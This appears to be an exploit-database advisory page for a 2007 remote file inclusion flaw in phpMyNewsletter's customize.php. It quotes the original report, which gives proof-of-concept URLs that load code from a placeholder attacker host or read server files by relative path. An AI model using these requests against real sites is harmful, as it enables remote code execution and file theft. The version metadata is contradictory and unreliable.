phpMyNewsletter include file vulnerability

vendor:

phpMyNewsletter

by:

frog-m@n

7.5

CVSS

HIGH

Include file vulnerability

CWE

Product Name: phpMyNewsletter

Affected Version From: 2000.6.10

Affected Version To: 0.7beta1

Patch Exists: YES

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

phpMyNewsletter include file vulnerability

The vulnerability allows an attacker to include arbitrary files from the server or from a remote location, potentially leading to remote code execution or information disclosure. The exploit can be triggered by manipulating the 'l' parameter in the customize.php script. The attacker can provide a remote file containing malicious code or specify a relative path to view sensitive files on the server.

Mitigation:

The vulnerability has been patched in the latest version (0.7beta1) of phpMyNewsletter. Users are advised to update to the latest version to mitigate the risk.

Source

Exploit-DB raw data:

Product : phpMyNewsletter
Tested version : 0.6.10
Website : http://gregory.kokanosky.free.fr/phpmynewsletter/
Problem : include file

PHP code :
Â°Â°Â°Â°Â°Â°Â°Â°Â°Â°
---- /include/customize.php ----
<?
$langfile = $l;

include $l;
?>
---- /include/customize.php ----

Exploit :
Â°Â°Â°Â°Â°Â°Â°Â°Â°
http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World
With in http://[attacker]/code.txt :
<? echo $text; ?>

or
http://[target]/include/customize.php?l=../path/file/to/view

Patch :
Â°Â°Â°Â°Â°Â°Â°
Autor has been alerted and last version (0.7beta1) has been patched.

More details
- in french :
http://www.frog-man.org/tutos/phpMyNewsletter.txt
- translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpMyNewsletter.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n 

# milw0rm.com [2007-04-04]